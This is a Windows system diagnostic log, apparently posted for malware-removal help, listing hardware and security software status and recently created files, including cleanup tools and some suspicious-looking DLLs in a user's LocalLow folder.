Display Adapters: Intel® HD Graphics Family | Intel® HD Graphics Family | NVIDIA GeForce GT 525M | RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver

Monitors: 1x; Generic PnP Monitor |

Screen Resolution: 1366 X 768 - 32 bit

Network: Network Present

Network Adapters: Microsoft Virtual WiFi Miniport Adapter #2 | Microsoft Virtual WiFi Miniport Adapter | Realtek PCIe FE Family Controller | Intel® WiFi Link 1000 BGN

CD / DVD Drives: 1x (D: | ) D: MATSHITABD-MLT UJ260F

Ports: COM Ports NOT Present. LPT Port NOT Present.

Mouse: 5 Button Wheel Mouse Present

Hard Disks: C: 449.2GB

Hard Disks - Free: C: 294.7GB

Manufacturer *: TOSHIBA

BIOS Info: AT/AT COMPATIBLE | 10/30/12 | TOSCPL - 1072009

Time Zone: Central Standard Time

Motherboard *: TOSHIBA POQAA

Country: United States

Language: ENU

==== System Specs (Software) ======================

Anti-Virus: Norton 360 Premier Edition On-access scanning disabled (Outdated)

Anti-Spyware: Norton 360 Premier Edition disabled (Outdated)

Anti-Spyware: Windows Defender disabled (Outdated)

Firewall: Norton 360 Premier Edition disabled

Internet Explorer Version: 11.0.9600.17358

Google Chrome version: 38.0.2125.111

Adobe Reader version: 11.0.9.29

Sun Java version: 1.8.0_25 (32-bit)

Sun Java version: 1.8.0_25 (64-bit)

Flash Player version: 15.0.0.152

==== Files Recently Created / Modified ======================

====== C:\windows ====

2014-10-29 12:08:37 F042EE4C8D66248D9B86DCF52ABAE416 256000 ----a-w- C:\windows\PEV.exe

2014-10-29 12:08:37 5E832F4FAF5F481F2EAF3B3A48F603B8 68096 ----a-w- C:\windows\zip.exe

2014-10-29 12:08:37 0277C027A26428DB64EF4F64F52BB4FD 208896 ----a-w- C:\windows\MBR.exe

2014-10-29 12:08:36 9E05A9C264C8A908A8E79450FCBFF047 80412 ----a-w- C:\windows\grep.exe

2014-10-29 12:08:36 0297C72529807322B152F517FDB0A9FC 406528 ----a-w- C:\windows\SWSC.exe

====== C:\Users\ADH~1.HEA\AppData\Local\Temp ====

2014-10-30 00:52:58 D96111A5E60B604E022CF5AAD09D1522 509440 ----a-w- C:\Users\Heathman\AppData\Local\temp\sqlite-3.6.20-sqlitejdbc.dll

====== Java Cache =====

====== C:\windows\SysWOW64 =====

2014-10-30 11:57:50 A042349B7208BF8BED858B1E9B48B06D 98216 ----a-w- C:\windows\SysWOW64\WindowsAccessBridge-32.dll

2014-10-30 11:40:25 AD27563BC16AB1EAACAE3033E99C2F78 194048 ----a-w- C:\windows\SysWOW64\elshyph.dll

2014-10-30 11:40:19 FBE852643EDEB9D6D6502AFE6017CD64 678400 ----a-w- C:\windows\SysWOW64\ieapfltr.dll

2014-10-30 11:40:19 F91E55DA404B834648A3B0A2477C10DB 17484800 ----a-w- C:\windows\SysWOW64\mshtml.dll

2014-10-30 11:40:19 F862CD08F1AD4EE39BD506853F3C6103 16284 ----a-w- C:\windows\SysWOW64\ieuinit.inf

2014-10-30 11:40:19 F7B6E341F4B1947BEC0E14EEBE3C627E 111616 ----a-w- C:\windows\SysWOW64\IEAdvpack.dll

2014-10-30 11:40:19 EF94FA1F3D90520CCA4AE65D639A9E62 11807232 ----a-w- C:\windows\SysWOW64\ieframe.dll

2014-10-30 11:40:19 EC7038154490E50ACD405A022F51B204 83456 ----a-w- C:\windows\SysWOW64\inseng.dll

2014-10-30 11:40:19 DF59F2510EDABBF216FA837D5D964106 51200 ----a-w- C:\windows\SysWOW64\ieetwproxystub.dll

2014-10-30 11:40:19 DF4BA130BD41F29A894E026E456B8481 454656 ----a-w- C:\windows\SysWOW64\vbscript.dll

2014-10-30 11:40:19 D9F12F54E3B5A092F1D5F191F5286E53 337408 ----a-w- C:\windows\SysWOW64\html.iec

2014-10-30 11:40:19 D78C4DB153874DB7AC6AA6A03BE38B66 331448 ----a-w- C:\windows\SysWOW64\iedkcs32.dll

2014-10-30 11:40:19 D03EB7605435FE24ADE670661A932651 4201472 ----a-w- C:\windows\SysWOW64\jscript9.dll

2014-10-30 11:40:19 CFCE4EFF1D6D909EE2EA3AFCB8F1E677 233472 ----a-w- C:\windows\SysWOW64\url.dll

2014-10-30 11:40:19 C1A6E565B2782C09BC40AD749B46D9ED 71680 ----a-w- C:\windows\SysWOW64\RegisterIEPKEYs.exe

2014-10-30 11:40:19 C17139EAF939964142C7A1AEEE02DC81 616104 ----a-w- C:\windows\SysWOW64\ieapfltr.dat

2014-10-30 11:40:19 BD66BA5A924DCC8392CFAEB67131A246 597504 ----a-w- C:\windows\SysWOW64\jscript9diag.dll

2014-10-30 11:40:19 B89F5D2B3D3BC730FAB93CFCD931742F 607744 ----a-w- C:\windows\SysWOW64\msfeeds.dll

2014-10-30 11:40:19 B74B348D13134D67B4F68ADDDC76A447 43008 ----a-w- C:\windows\SysWOW64\jsproxy.dll

2014-10-30 11:40:19 B5B1C277E46A5B0E2FC63E5FC5624CE5 365056 ----a-w- C:\windows\SysWOW64\dxtmsft.dll

2014-10-30 11:40:19 AE6A2C5ECD3E96556E22F12816842F60 48640 ----a-w- C:\windows\SysWOW64\mshtmler.dll

2014-10-30 11:40:19 ABDFC692D9FE43E2BA8FE6CB5A8CB95A 13312 ----a-w- C:\windows\SysWOW64\mshta.exe

2014-10-30 11:40:19 AB3B2CA52AFB695AFCDD2620A21E5B21 24576 ----a-w- C:\windows\SysWOW64\licmgr10.dll

2014-10-30 11:40:19 AA103FEAD721863B86A1B1260948E662 112128 ----a-w- C:\windows\SysWOW64\ieUnatt.exe

2014-10-30 11:40:19 9E170B0AF156B478BD2B1FD6A2250C9E 62464 ----a-w- C:\windows\SysWOW64\tdc.ocx

2014-10-30 11:40:19 9B8701A380CEE1B05D651B4ED4048C8F 645120 ----a-w- C:\windows\SysWOW64\jsIntl.dll

2014-10-30 11:40:19 9A33FDDD687A836A1FD478B43C5A95FD 151552 ----a-w- C:\windows\SysWOW64\iexpress.exe

2014-10-30 11:40:19 97F2F82BF0B4AF86A85FFDD78DFDC87D 60416 ----a-w- C:\windows\SysWOW64\JavaScriptCollectionAgent.dll

2014-10-30 11:40:19 8FAA1E45198C4ECEC691326B7F5E71C5 61952 ----a-w- C:\windows\SysWOW64\iesetup.dll

2014-10-30 11:40:19 8E8E6E7B4CC27B92F40F74E29C1F6290 1068032 ----a-w- C:\windows\SysWOW64\mshtmlmedia.dll

2014-10-30 11:40:19 887055A3C8DD6C87D200D11EAFDBD45B 74240 ----a-w- C:\windows\SysWOW64\SetIEInstalledDate.exe

2014-10-30 11:40:19 835807E2AC0A8FA15B9A2EA80E2D5169 2017280 ----a-w- C:\windows\SysWOW64\inetcpl.cpl

2014-10-30 11:40:19 7AE80F921027CF88CB9D0433088A3E55 1810944 ----a-w- C:\windows\SysWOW64\wininet.dll

2014-10-30 11:40:19 779E142FE2159935E78C0FA2E190FF1E 610304 ----a-w- C:\windows\SysWOW64\jscript.dll

2014-10-30 11:40:19 6EB0B7301E00F717BD68A742D1391FAF 36352 ----a-w- C:\windows\SysWOW64\imgutil.dll

2014-10-30 11:40:19 6D4DD5706C297234F457B9D9018C493F 61952 ----a-w- C:\windows\SysWOW64\MshtmlDac.dll

2014-10-30 11:40:19 6A92CEC8532056791C6832B2725D170D 139264 ----a-w- C:\windows\SysWOW64\wextract.exe

2014-10-30 11:40:19 604C67F58747D6A333EA641BCCC2C842 32768 ----a-w- C:\windows\SysWOW64\iernonce.dll

2014-10-30 11:40:19 58EC068116BCE16A94B1B2C429A35E41 2724864 ----a-w- C:\windows\SysWOW64\mshtml.tlb

2014-10-30 11:40:19 55A400FDB21D157E947A0EE65AEDB1B3 2187264 ----a-w- C:\windows\SysWOW64\iertutil.dll

2014-10-30 11:40:19 55969AADF0210A614700F89B48976F68 43008 ----a-w- C:\windows\SysWOW64\msfeedsbs.dll

2014-10-30 11:40:19 53FC62C51CB18C9100A7DFAF2D2A6C47 12800 ----a-w- C:\windows\SysWOW64\msfeedssync.exe

2014-10-30 11:40:19 4F032F1FDEFEA5EC8EEA3562643B5EE8 69120 ----a-w- C:\windows\SysWOW64\icardie.dll

2014-10-30 11:40:19 4BCC7EB5F20840DA67943BD86AE95735 56832 ----a-w- C:\windows\SysWOW64\pngfilt.dll

2014-10-30 11:40:19 410BECCA3354D471E45344F0754CC0E4 243200 ----a-w- C:\windows\SysWOW64\dxtrans.dll

2014-10-30 11:40:19 3065FF6794A7FDC882F0DA8B6230AB6E 1190400 ----a-w- C:\windows\SysWOW64\urlmon.dll

2014-10-30 11:40:19 298FDE634538B62CEEEC266D8773B21A 182272 ----a-w- C:\windows\SysWOW64\msls31.dll

2014-10-30 11:40:19 2409C41081D657A3FABE3659BB989AFB 164864 ----a-w- C:\windows\SysWOW64\msrating.dll

2014-10-30 11:40:19 201EAFA3F17BE4990999C28657212D8E 69632 ----a-w- C:\windows\SysWOW64\mshtmled.dll

2014-10-30 11:40:19 1AFBAA54BDF637F69B8E02A5578286B0 116736 ----a-w- C:\windows\SysWOW64\iepeers.dll

2014-10-30 11:40:19 158690737381C49120165A7F3F5D13EB 440320 ----a-w- C:\windows\SysWOW64\ieui.dll

2014-10-30 11:40:19 1200D9C7DB0ADC1B8143A0A9921BF7DA 127488 ----a-w- C:\windows\SysWOW64\occache.dll

2014-10-30 11:40:19 03B3541AE6986602CF9CB5B3AD169C33 208384 ----a-w- C:\windows\SysWOW64\webcheck.dll

2014-10-20 17:22:00 0C9988BDA3CEC3C421B773982C5E2EC6 5703168 ----a-w- C:\windows\SysWOW64\mstscax.dll

2014-10-19 21:51:28 AB5EFB103DB01C1912C9D2F545EA5621 17920 ----a-w- C:\windows\SysWOW64\wksprtPS.dll

2014-10-19 21:51:28 8DEEE20D8D30E9B0FBDCA31E58A027BD 53248 ----a-w- C:\windows\SysWOW64\tsgqec.dll

2014-10-19 21:51:28 4676AAA9DDF52A50C829FEDB4EA81E54 1068544 ----a-w- C:\windows\SysWOW64\mstsc.exe

2014-10-19 21:51:28 2EFB1279E7BEA7D12D9F4D6508D27880 50176 ----a-w- C:\windows\SysWOW64\MsRdpWebAccess.dll

2014-10-19 21:51:27 5E676B296B762E211D83B87635F2C330 855552 ----a-w- C:\windows\SysWOW64\rdvidcrl.dll

2014-10-19 20:49:00 BBA80D3CAB22620A6AC9BB603386EE33 519680 ----a-w- C:\windows\SysWOW64\qdvd.dll

2014-10-19 20:48:57 A139A5E6B34F136405B030EA04595A20 156824 ----a-w- C:\windows\SysWOW64\mscorier.dll

2014-10-19 20:48:57 8580484193CE0A0788830FBAB97CF13B 1131664 ----a-w- C:\windows\SysWOW64\dfshim.dll

2014-10-19 20:48:56 D5D5BBF6AA45D820BAA0BD1303B8AAF6 81560 ----a-w- C:\windows\SysWOW64\mscories.dll

2014-10-19 20:48:53 06FC8A93A4FA1F42A3D1D06694F2B339 419992 ----a-w- C:\windows\SysWOW64\locale.nls

2014-10-19 20:48:50 C7673B3F8BB35221B42D67BF7ADAFDFD 7168 ----a-w- C:\windows\SysWOW64\KBDYAK.DLL

2014-10-19 20:48:50 730B7C639957EA0BF37C1459831A1E19 6656 ----a-w- C:\windows\SysWOW64\KBDRU1.DLL

2014-10-19 20:48:50 72222991598E173BBE1429426926C020 7168 ----a-w- C:\windows\SysWOW64\KBDTAT.DLL

2014-10-19 20:48:50 45B308F20FEF040BD7321E85F69DF5E2 6656 ----a-w- C:\windows\SysWOW64\KBDRU.DLL

2014-10-19 20:48:50 2BD0519015E899A2FF52210CC5875F88 6656 ----a-w- C:\windows\SysWOW64\KBDBASH.DLL

2014-10-19 20:48:40 3888D02CE6413C2A06D903DE1C778BF5 2363904 ----a-w- C:\windows\SysWOW64\msi.dll

2014-10-19 20:48:25 37C395C075E6FA66623C82DE50A8FAED 372736 ----a-w- C:\windows\SysWOW64\rastls.dll

2014-10-19 20:48:13 FD67683FBA9B2C4BB551780BD8846F64 157696 ----a-w- C:\windows\SysWOW64\winsta.dll

2014-10-19 20:48:13 DB1D6751689B4A7EE2439C64F2ADF1C9 17408 ----a-w- C:\windows\SysWOW64\credssp.dll

2014-10-19 20:48:13 13829161C1297F4170A5546430147BBD 65536 ----a-w- C:\windows\SysWOW64\TSpkg.dll

2014-10-19 20:45:57 C120855C1133DF8FFD5E0C04A7E70B67 67072 ----a-w- C:\windows\SysWOW64\packager.dll

====== C:\windows\SysWOW64\drivers =====

====== C:\windows\Sysnative =====

2014-10-30 11:42:05 2D01F001F8E45924E57B7BB77CF96BC2 28368 ----a-w- C:\windows\Sysnative\IEUDINIT.EXE

2014-10-30 11:40:25 344DA9D196C0D98A738289BB09CE4CF6 940032 ----a-w- C:\windows\Sysnative\MsSpellCheckingFacility.exe

2014-10-30 11:40:19 8F7FBD0177F79727CF945ABDA657A0AC 235008 ----a-w- C:\windows\Sysnative\elshyph.dll

2014-10-30 11:40:18 FD61D51199F3FC9EB0023FBF405EAAD0 147968 ----a-w- C:\windows\Sysnative\occache.dll

2014-10-30 11:40:18 F9FA80C1CB6EAC55A7F534937F6AC4E4 139264 ----a-w- C:\windows\Sysnative\ieUnatt.exe

2014-10-30 11:40:18 F862CD08F1AD4EE39BD506853F3C6103 16284 ----a-w- C:\windows\Sysnative\ieuinit.inf

2014-10-30 11:40:18 F00AE7B953ABEF1B53FBBA187DFC8238 243200 ----a-w- C:\windows\Sysnative\webcheck.dll

2014-10-30 11:40:18 EB710A3AF29BEC4EE7475A1ED5C575DE 195584 ----a-w- C:\windows\Sysnative\msrating.dll

2014-10-30 11:40:18 E9109E91BB8366759822DC2FC9B5DA8B 111616 ----a-w- C:\windows\Sysnative\ieetwcollector.exe

2014-10-30 11:40:18 E70D4270C43CE6C46841B684315B9EFF 62464 ----a-w- C:\windows\Sysnative\pngfilt.dll

2014-10-30 11:40:18 E4A6577D74B2439974C8018AB5F1BFEA 13312 ----a-w- C:\windows\Sysnative\msfeedssync.exe

2014-10-30 11:40:18 DD8E9C85F9F428859713055183661956 48640 ----a-w- C:\windows\Sysnative\ieetwproxystub.dll

2014-10-30 11:40:18 DB101A62F9BF8E7765685950169EF52B 758272 ----a-w- C:\windows\Sysnative\jscript9diag.dll

2014-10-30 11:40:18 DAF317E9F4CEC206D0D443014A427341 446464 ----a-w- C:\windows\Sysnative\dxtmsft.dll

2014-10-30 11:40:18 D3B07C2FABEAE749E4E51F1E93CABA23 5829632 ----a-w- C:\windows\Sysnative\jscript9.dll

2014-10-30 11:40:18 D31AE751B6DACAFD0D7CC99EAE9606C2 131072 ----a-w- C:\windows\Sysnative\IEAdvpack.dll

2014-10-30 11:40:18 CE8831D2DCB5803A4CBC8EDCCBBC2A05 77312 ----a-w- C:\windows\Sysnative\tdc.ocx

2014-10-30 11:40:18 C92173481A58935BE15172079CF122B8 235520 ----a-w- C:\windows\Sysnative\url.dll

2014-10-30 11:40:18 C17139EAF939964142C7A1AEEE02DC81 616104 ----a-w- C:\windows\Sysnative\ieapfltr.dat

2014-10-30 11:40:18 C109D5136DF0A6CA668C7AD888AA125F 2724864 ----a-w- C:\windows\Sysnative\mshtml.tlb

2014-10-30 11:40:18 BE37AA454460539877420951EEA16EF0 51200 ----a-w- C:\windows\Sysnative\jsproxy.dll

2014-10-30 11:40:18 BB6DEAFAC5F0AAEC37FEAF3F3AA48347 774144 ----a-w- C:\windows\Sysnative\jscript.dll

2014-10-30 11:40:18 B07E9AFF50DC007E7D5AC54736AA5A25 4096 ----a-w- C:\windows\Sysnative\ieetwcollectorres.dll

2014-10-30 11:40:18 ADA5C3D49A12CED9F07913DC00E547A8 48128 ----a-w- C:\windows\Sysnative\imgutil.dll

2014-10-30 11:40:18 A2105E46DC9CE38A1D57FB124436E1BC 85504 ----a-w- C:\windows\Sysnative\mshtmled.dll

2014-10-30 11:40:18 9D98D4F390F0B14A782F3B931E613A1A 2309632 ----a-w- C:\windows\Sysnative\wininet.dll

2014-10-30 11:40:18 98241BE7EB26C41562D33393DD12608F 289280 ----a-w- C:\windows\Sysnative\dxtrans.dll

2014-10-30 11:40:18 9675B272086CF5D22B83B541FAA8D4EA 30208 ----a-w- C:\windows\Sysnative\licmgr10.dll

2014-10-30 11:40:18 95828D670CFD3B16EE188168E083C3C5 13824 ----a-w- C:\windows\Sysnative\mshta.exe

2014-10-30 11:40:18 88D2165E07CEDC3F34CBE1A5A807673D 595968 ----a-w- C:\windows\Sysnative\ieui.dll

2014-10-30 11:40:18 87D14AF9A2C3F3D5233B613CFA9C321D 378552 ----a-w- C:\windows\Sysnative\iedkcs32.dll

2014-10-30 11:40:18 7E60EE8A68F7270D1E1662CBA275D4FA 13619200 ----a-w- C:\windows\Sysnative\ieframe.dll

2014-10-30 11:40:18 7415B29AFE2E4494A57358B8C7E78600 23631360 ----a-w- C:\windows\Sysnative\mshtml.dll

2014-10-30 11:40:18 739D9C9F220CCEDAFD8212C6B976B60D 33792 ----a-w- C:\windows\Sysnative\iernonce.dll

2014-10-30 11:40:18 70527367E5779C3537992F0768D9C59A 1249280 ----a-w- C:\windows\Sysnative\mshtmlmedia.dll

2014-10-30 11:40:18 6F1AF8E1206E92256459E3012C20472A 942592 ----a-w- C:\windows\Sysnative\jsIntl.dll

2014-10-30 11:40:18 646C004F58AA4762F92BF7C595216C37 2108416 ----a-w- C:\windows\Sysnative\inetcpl.cpl

2014-10-30 11:40:18 5BBDBE5EBB49EA7C76A2EE7490A45D68 101376 ----a-w- C:\windows\Sysnative\inseng.dll

2014-10-30 11:40:18 5141B67F14E2B6CBB6ADF851ABE364A5 90112 ----a-w- C:\windows\Sysnative\SetIEInstalledDate.exe

2014-10-30 11:40:18 4D21F4FDF57DF86FAD9149ED1C071D15 72704 ----a-w- C:\windows\Sysnative\JavaScriptCollectionAgent.dll

2014-10-30 11:40:18 46FD16F9B1924A2EA8CD5C6716CC654F 167424 ----a-w- C:\windows\Sysnative\iexpress.exe

2014-10-30 11:40:18 45B736E3184B68515FDB71D4083A9BCF 731136 ----a-w- C:\windows\Sysnative\msfeeds.dll

2014-10-30 11:40:18 4399857346DD183683332921500046B1 86016 ----a-w- C:\windows\Sysnative\RegisterIEPKEYs.exe

2014-10-30 11:40:18 3A4FD19F13F8809BA08E9F76C0E38832 413696 ----a-w- C:\windows\Sysnative\html.iec

2014-10-30 11:40:18 328143D6BC5951E1797BD524C4E98CDC 547328 ----a-w- C:\windows\Sysnative\vbscript.dll

2014-10-30 11:40:18 30FB9ABB6C45C3299CFA5F556904DD5F 83968 ----a-w- C:\windows\Sysnative\MshtmlDac.dll

2014-10-30 11:40:18 2EBD0C5B090125AECF017C57344C45AB 247808 ----a-w- C:\windows\Sysnative\msls31.dll

2014-10-30 11:40:18 2E5AF1507CBE735B4D7EBFF1908EA0E1 775168 ----a-w- C:\windows\Sysnative\ieapfltr.dll

2014-10-30 11:40:18 29C0530E0F120AC3E583889DCD6A63DD 710656 ----a-w- C:\windows\Sysnative\ie4uinit.exe

2014-10-30 11:40:18 2405D24AA28CCC4CC7E0CC0AE008746F 48640 ----a-w- C:\windows\Sysnative\mshtmler.dll

2014-10-30 11:40:18 1FCBE949A67939ADEAE7279E423AA684 135680 ----a-w- C:\windows\Sysnative\iepeers.dll

2014-10-30 11:40:18 1EA6500C25A80E8BDB65099C509AF993 143872 ----a-w- C:\windows\Sysnative\wextract.exe

2014-10-30 11:40:18 0FBEBD36FEFFEE5AF25FDAEE5E35EE99 105984 ----a-w- C:\windows\Sysnative\iesysprep.dll

2014-10-30 11:40:18 0F5A279522FA6A30C9C5A297A1064933 1447936 ----a-w- C:\windows\Sysnative\urlmon.dll

2014-10-30 11:40:18 0A9D5716CB1F3AFA73703F39647BB8C2 81408 ----a-w- C:\windows\Sysnative\icardie.dll

2014-10-30 11:40:18 050FD78BA4EFA62417F61F4C098B5B25 2796032 ----a-w- C:\windows\Sysnative\iertutil.dll

2014-10-30 11:40:18 0467A4DDA6B2CE8E27A8178BF035BA18 66048 ----a-w- C:\windows\Sysnative\iesetup.dll

2014-10-30 11:40:18 038ABC9BCC86DFF9E181D44E43E2CEBA 52224 ----a-w- C:\windows\Sysnative\msfeedsbs.dll

2014-10-20 17:22:00 6DD73E4E947DB3B0608321AE13210D94 6584320 ----a-w- C:\windows\Sysnative\mstscax.dll

2014-10-19 21:51:30 DDED7C5558B3AE09F568945281A9A6D1 44544 ----a-w- C:\windows\Sysnative\TsUsbGDCoInstaller.dll

2014-10-19 21:51:28 FEC6178962DFF33074D39CA907971405 12800 ----a-w- C:\windows\Sysnative\TsUsbRedirectionGroupPolicyExtension.dll

2014-10-19 21:51:28 8E75B1112C374EBDF18FD640DA2F0655 1147392 ----a-w- C:\windows\Sysnative\mstsc.exe

2014-10-19 21:51:28 7BD2E6E2458A5B95F8341244C7FC7DD4 18944 ----a-w- C:\windows\Sysnative\wksprtPS.dll

2014-10-19 21:51:28 79EE5ECB4BE89343E4CF1E48F7769F59 420864 ----a-w- C:\windows\Sysnative\wksprt.exe

2014-10-19 21:51:28 5289A00E2D21BB3A7D6761646543ED5C 62976 ----a-w- C:\windows\Sysnative\tsgqec.dll

2014-10-19 21:51:28 149A388C17F04AD1F99B477A43BE1A9F 56832 ----a-w- C:\windows\Sysnative\MsRdpWebAccess.dll

2014-10-19 21:51:28 108C257D765AAD2E6EC46557DA0B02BD 13824 ----a-w- C:\windows\Sysnative\TsUsbRedirectionGroupPolicyControl.exe

2014-10-19 21:51:28 0D2C2FAC4F29B5868D39B7267058CFEF 83968 ----a-w- C:\windows\Sysnative\TSWbPrxy.exe

2014-10-19 21:51:27 A4420969E5AB94856E5C0C02E6099D3F 1057280 ----a-w- C:\windows\Sysnative\rdvidcrl.dll

2014-10-19 20:49:00 8D46C7BCDF7FBAAC8666D6640ADA930E 371712 ----a-w- C:\windows\Sysnative\qdvd.dll

2014-10-19 20:48:59 5602D4C331FD7938ADE06D9242138922 3198976 ----a-w- C:\windows\Sysnative\win32k.sys

2014-10-19 20:48:57 2D6C77A3DB3D8EE00FB55834A67E4073 156312 ----a-w- C:\windows\Sysnative\mscorier.dll

2014-10-19 20:48:56 50EC828370CB5F5E9FF08B10F1B701C8 73880 ----a-w- C:\windows\Sysnative\mscories.dll

2014-10-19 20:48:56 5083CC5456FE8A5D21ECF9E32ACC779F 1943696 ----a-w- C:\windows\Sysnative\dfshim.dll

2014-10-19 20:48:53 06FC8A93A4FA1F42A3D1D06694F2B339 419992 ----a-w- C:\windows\Sysnative\locale.nls

2014-10-19 20:48:50 BE67D99EDA34A68B827868371B5529AD 7168 ----a-w- C:\windows\Sysnative\KBDTAT.DLL

2014-10-19 20:48:50 80EDA24B00478FA795F90DFA09C12E86 7168 ----a-w- C:\windows\Sysnative\KBDRU1.DLL

2014-10-19 20:48:50 353C4A38042819CA83AEFC6F2E7051CD 6656 ----a-w- C:\windows\Sysnative\KBDRU.DLL

2014-10-19 20:48:49 EA21295A386C6DB2A2A90E657B37C5F4 7168 ----a-w- C:\windows\Sysnative\KBDYAK.DLL

2014-10-19 20:48:49 920B5C1CC0BAB6E574297BC3D945DA31 7168 ----a-w- C:\windows\Sysnative\KBDBASH.DLL

2014-10-19 20:48:47 974F83636F841739FEA5CC6219BFB241 276480 ----a-w- C:\windows\Sysnative\generaltel.dll

2014-10-19 20:48:47 510D5492BCA9E63E10E3CE0285965722 507392 ----a-w- C:\windows\Sysnative\aepdu.dll

2014-10-19 20:48:46 767D478BB4B2F84B47B3C0956E6A5A05 424448 ----a-w- C:\windows\Sysnative\aeinv.dll

2014-10-19 20:48:40 ADD3F2C3E6B89BD16D4BFC61B3658DD9 3241472 ----a-w- C:\windows\Sysnative\msi.dll

2014-10-19 20:48:29 E9CB5F138943D383DB67F29AAB60453F 3179520 ----a-w- C:\windows\Sysnative\rdpcorets.dll

2014-10-19 20:48:25 DD7C31F12936795C0516BB6C59CBCCD8 424448 ----a-w- C:\windows\Sysnative\rastls.dll

2014-10-19 20:48:13 C23B6D9D16FD86F446BE607CA18389D9 235520 ----a-w- C:\windows\Sysnative\winsta.dll

2014-10-19 20:48:13 85E03B6E05939845BC924C91AEDE0E24 86528 ----a-w- C:\windows\Sysnative\TSpkg.dll

2014-10-19 20:48:13 560CF90C026C0FE51CC6820302FF94FE 22016 ----a-w- C:\windows\Sysnative\credssp.dll

2014-10-19 20:48:13 4FC4C50985E5B840F4D72E57286887B8 681984 ----a-w- C:\windows\Sysnative\termsrv.dll

2014-10-19 20:48:13 0374D83D003043E7DE33036294A2EFAE 150528 ----a-w- C:\windows\Sysnative\rdpcorekmts.dll

2014-10-19 20:45:57 1DB68B8A1E3BDE3C19F1D3612CE436CA 77312 ----a-w- C:\windows\Sysnative\packager.dll

====== C:\windows\Sysnative\drivers =====

2014-10-19 21:51:28 E9981ECE8D894CEF7038FD1D040EB426 56832 ----a-w- C:\windows\Sysnative\drivers\TsUsbFlt.sys

2014-10-19 21:00:47 E16E2431516D904CED3946AD3FF8C86B 854 ----a-w- C:\windows\Sysnative\drivers\SYMEVENT64x86.INF

2014-10-19 21:00:47 97E11C50CE52277B377396EA8838E539 177752 ----a-w- C:\windows\Sysnative\drivers\SYMEVENT64x86.SYS

2014-10-19 21:00:47 7846ED59291A134CC5DD017C6EC7B433 8222 ----a-w- C:\windows\Sysnative\drivers\SYMEVENT64x86.CAT

2014-10-19 20:48:13 FE571E088C2D83619D2D48D4E961BF41 212480 ----a-w- C:\windows\Sysnative\drivers\rdpwd.sys

2014-10-19 20:48:13 E232A3B43A894BB327FC161529BD9ED1 39936 ----a-w- C:\windows\Sysnative\drivers\tssecsrv.sys

====== C:\windows\Tasks ======

====== C:\windows\Temp ======

======= C:\Program Files =====

======= C:\PROGRA~2 =====

2014-10-30 11:58:02 -------- d-----w- C:\PROGRA~2\COMMON~1\Java

2014-10-29 22:50:04 -------- d-----w- C:\PROGRA~2\ESET

======= C: =====

====== C:\Users\ADH.Heathman-PC\AppData\Roaming ======

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH~1.HEA\AppData\Local\EmieUserList

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH~1.HEA\AppData\Local\EmieSiteList

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH.Heathman-PC\AppData\Local\EmieUserList

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH.Heathman-PC\AppData\Local\EmieSiteList

2014-10-29 12:43:43 -------- d-----w- C:\Users\UpdatusUser\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\UpdatusUser.Heathman-PC\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Public\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Heathman\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Guest\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Default\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Default User\AppData\Local\temp

2014-10-26 14:59:41 B3492776EA0F205D29748B0DA1AC1F0F 29184 ----a-w- C:\Users\ADH~1.HEA\AppData\Locallow\grbfa.dll

2014-10-26 14:59:41 B3492776EA0F205D29748B0DA1AC1F0F 29184 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Locallow\grbfa.dll

2014-10-26 00:52:28 D41D8CD98F00B204E9800998ECF8427E 0 ----a-w- C:\Users\ADH~1.HEA\AppData\Locallow\seetla.dll

2014-10-26 00:52:28 D41D8CD98F00B204E9800998ECF8427E 0 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Locallow\seetla.dll

2014-10-26 00:52:27 25255DFC277D9234CED2DD203E85A4A2 29184 ----a-w- C:\Users\ADH~1.HEA\AppData\Locallow\srayb.dll

2014-10-26 00:52:27 25255DFC277D9234CED2DD203E85A4A2 29184 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Locallow\srayb.dll

2014-10-24 16:33:34 -------- d-----w- C:\Users\ADH~1.HEA\AppData\Locallow\{D2E3A4D8-4D43-490B-8F4B-24D5491A9ED1}

2014-10-24 16:33:34 -------- d-----w- C:\Users\ADH.Heathman-PC\AppData\Locallow\{D2E3A4D8-4D43-490B-8F4B-24D5491A9ED1}

2014-10-21 15:22:45 -------- d-----w- C:\Users\ADH~1.HEA\AppData\Local\Diagnostics

2014-10-21 15:22:45 -------- d-----w- C:\Users\ADH.Heathman-PC\AppData\Local\Diagnostics

====== C:\Users\ADH.Heathman-PC ======

2014-10-30 11:57:42 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

2014-10-30 11:57:33 -------- d-----w- C:\ProgramData\Oracle

2014-10-29 22:49:53 E8D3E34FFDAF21DF7C09CBBBA5763237 2347384 ----a-w- C:\Users\ADH~1.HEA\Downloads\esetsmartinstaller_enu.exe

2014-10-29 22:49:53 E8D3E34FFDAF21DF7C09CBBBA5763237 2347384 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\esetsmartinstaller_enu.exe

2014-10-29 17:59:31 -------- d-----w- C:\Users\Public\TOSHIBA

2014-10-29 13:07:36 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\ADH~1.HEA\Desktop\OTL.exe

2014-10-29 13:07:36 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

2014-10-29 12:43:43 -------- d-----w- C:\Users\Public\AppData

2014-10-29 03:33:56 5DCED6B6A9BF0C12079E8F9513B3C8C1 4974864 ----a-w- C:\Users\Heathman\Downloads\ccsetup419.exe

2014-10-27 22:51:39 731BB89065411453860C48EEE348961E 120407800 ----a-w- C:\Users\ADH~1.HEA\Downloads\msert.exe

